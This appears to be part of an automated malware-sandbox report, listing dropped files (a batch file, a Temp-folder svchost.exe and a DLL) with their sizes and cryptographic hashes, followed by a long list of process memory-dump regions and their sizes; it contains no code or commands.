Filesize
2.1MB

MD5
7f93db1b1ba5dd798ee0fb7ac1ee5b5a

SHA1
b68db4bdb7ad77c720a1861ec9158b49b99c3473

SHA256
50806e50951c2ab080a1ad10873349940355d49cbecf564bdc4d3ca65516dff2

SHA512
41e7df8738ef3f549d20c3943d0a4b2aa34e91675604d0bec62fa6633d7fb262a38adcde70b8c08639cbf9d62cf043b4220b8fc20483f061687815da22faef5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
2.1MB

MD5
fc7c63ffa72326c3641efbdf507ab046

SHA1
a65964ee890eabc1e09d16ad4a36fa0530290435

SHA256
3bac3a7196c4e1f347bbfc4bb7319c14a60155edadb246cc41f3a251b76f3bf6

SHA512
39168751411ceff6b44013bb3eb2ca4a59c6b11f119d3fac72fcf85d401113170dd056d8dcdce29f0f60b38feedc0cb4bc72461ed32c17d6a616c446eacd62e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
476B

MD5
4edd28bf306d37273a4b30ef3f75d92f

SHA1
db8fbd39931f0faaa160c700435279210bf97cc3

SHA256
e49d849e2a89613a493a07ee4f15f56cde89073e1dc527a4881846dd03eaa130

SHA512
b05fb8ff44ce032d09f096de855d99d64f64c03dead392863aa186edd05809fc99825862432dc7b826447b5880fe7b1eeb6135502df35d0227c16691665530df

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
7.1MB

MD5
45d20d471e6f3f8f088d489d62058f23

SHA1
d261d037781fb5e7124a40df3d2e32e4d694c2c4

SHA256
36fb77c427020d85e61482f25c7e8127221e1d48c358be97728068e6a487b711

SHA512
3e04852233147146e76684ebcc335e6281413796cf148d34234b86753a3f2b2afb2e58853d44873dc43f9578639ef55f35aab98aaee7dda718f6cfaeb4e4a02e

Download Submit
\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

Filesize
742KB

MD5
544cd51a596619b78e9b54b70088307d

SHA1
4769ddd2dbc1dc44b758964ed0bd231b85880b65

SHA256
dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd

SHA512
f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

Download Submit
memory/304-207-0x0000000007E10000-0x0000000007E76000-memory.dmp

Filesize
408KB

Download
memory/304-206-0x0000000007D70000-0x0000000007D92000-memory.dmp

Filesize
136KB

Download
memory/304-203-0x0000000006FD0000-0x0000000006FE0000-memory.dmp

Filesize
64KB

Download
memory/304-199-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/304-201-0x0000000006FD0000-0x0000000006FE0000-memory.dmp

Filesize
64KB

Download
memory/304-200-0x0000000007610000-0x0000000007C38000-memory.dmp

Filesize
6.2MB

Download
memory/304-198-0x0000000004E30000-0x0000000004E66000-memory.dmp

Filesize
216KB

Download
memory/2088-24-0x0000000000DE0000-0x0000000002BA6000-memory.dmp

Filesize
29.8MB

Download
memory/2088-19-0x0000000000DE0000-0x0000000002BA6000-memory.dmp

Filesize
29.8MB

Download
memory/2088-21-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/2088-20-0x0000000000620000-0x0000000000621000-memory.dmp

Filesize
4KB

Download
memory/2088-22-0x0000000000DE0000-0x0000000002BA6000-memory.dmp

Filesize
29.8MB

Download
memory/2668-185-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2668-192-0x00000000054E0000-0x00000000054F0000-memory.dmp

Filesize
64KB

Download
memory/2668-191-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/3324-186-0x0000000000600000-0x0000000000700000-memory.dmp

Filesize
1024KB

Download
memory/3656-62-0x0000000006B10000-0x0000000006B4E000-memory.dmp

Filesize
248KB

Download
memory/3656-118-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/3656-64-0x0000000009090000-0x00000000090F6000-memory.dmp

Filesize
408KB

Download
memory/3656-66-0x0000000009590000-0x00000000095E0000-memory.dmp

Filesize
320KB

Download
memory/3656-69-0x0000000009A90000-0x0000000009C52000-memory.dmp

Filesize
1.8MB

Download
memory/3656-70-0x000000000A190000-0x000000000A6BC000-memory.dmp

Filesize
5.2MB

Download
memory/3656-37-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/3656-36-0x0000000004E60000-0x0000000004EF2000-memory.dmp

Filesize
584KB

Download
memory/3656-35-0x0000000005360000-0x000000000585E000-memory.dmp

Filesize
5.0MB

Download
memory/3656-38-0x0000000004F70000-0x0000000004F7A000-memory.dmp

Filesize
40KB

Download
memory/3656-32-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/3656-56-0x00000000052D0000-0x0000000005346000-memory.dmp

Filesize
472KB

Download
memory/3656-63-0x00000000083F0000-0x000000000843B000-memory.dmp

Filesize
300KB

Download
memory/3656-124-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/3656-61-0x0000000006AB0000-0x0000000006AC2000-memory.dmp

Filesize
72KB

Download
memory/3656-60-0x00000000082E0000-0x00000000083EA000-memory.dmp

Filesize
1.0MB

Download
memory/3656-65-0x00000000050D0000-0x00000000050E0000-memory.dmp

Filesize
64KB

Download
memory/3656-59-0x0000000006B90000-0x0000000007196000-memory.dmp

Filesize
6.0MB

Download
memory/3656-57-0x0000000006220000-0x000000000623E000-memory.dmp

Filesize
120KB

Download
memory/4104-31-0x0000000000080000-0x00000000000FE000-memory.dmp

Filesize
504KB

Download
memory/4104-33-0x0000000000080000-0x00000000000FE000-memory.dmp

Filesize
504KB

Download
memory/4140-25-0x00000000012C0000-0x000000000302A000-memory.dmp

Filesize
29.4MB

Download
memory/4140-9-0x0000000001020000-0x0000000001021000-memory.dmp

Filesize
4KB

Download
memory/4140-8-0x0000000001010000-0x0000000001011000-memory.dmp

Filesize
4KB

Download
memory/4140-7-0x0000000001000000-0x0000000001001000-memory.dmp

Filesize
4KB

Download
memory/4140-6-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

Filesize
4KB

Download
memory/4140-5-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

Filesize
4KB

Download
memory/4140-4-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

Filesize
4KB

Download
memory/4140-3-0x0000000000E90000-0x0000000000E91000-memory.dmp

Filesize
4KB

Download
memory/4140-2-0x0000000000E80000-0x0000000000E81000-memory.dmp

Filesize
4KB

Download
memory/4140-0-0x00000000012C0000-0x000000000302A000-memory.dmp

Filesize
29.4MB

Download
memory/4140-10-0x00000000012C0000-0x000000000302A000-memory.dmp

Filesize
29.4MB

Download
memory/4140-39-0x00000000012C0000-0x000000000302A000-memory.dmp

Filesize
29.4MB

Download
memory/4436-122-0x00000000032A0000-0x000000000333C000-memory.dmp

Filesize
624KB

Download
memory/4436-126-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-141-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-143-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-144-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-145-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-146-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-119-0x00000000005C0000-0x0000000000CD0000-memory.dmp

Filesize
7.1MB

Download
memory/4436-120-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/4436-123-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-125-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/4436-142-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-205-0x0000000005FE0000-0x0000000006000000-memory.dmp

Filesize
128KB

Download
memory/4436-137-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-202-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-127-0x0000000006240000-0x00000000064DC000-memory.dmp

Filesize
2.6MB

Download
memory/4436-128-0x0000000007EE0000-0x00000000082BA000-memory.dmp

Filesize
3.9MB

Download
memory/4436-129-0x0000000007B00000-0x0000000007E50000-memory.dmp

Filesize
3.3MB

Download
memory/4436-130-0x00000000082C0000-0x0000000008452000-memory.dmp

Filesize
1.6MB

Download
memory/4436-197-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-136-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-196-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-195-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-138-0x0000000001580000-0x0000000001590000-memory.dmp

Filesize
64KB

Download
memory/4436-140-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4436-139-0x0000000006000000-0x0000000006100000-memory.dmp

Filesize
1024KB

Download
memory/4836-155-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-165-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-167-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-168-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-170-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-162-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-161-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-159-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-157-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-156-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-154-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-150-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-153-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-152-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4836-151-0x00000000054D0000-0x00000000054E0000-memory.dmp

Filesize
64KB

Download
memory/4836-149-0x00000000725E0000-0x0000000072CCE000-memory.dmp

Filesize
6.9MB

Download
memory/4836-147-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download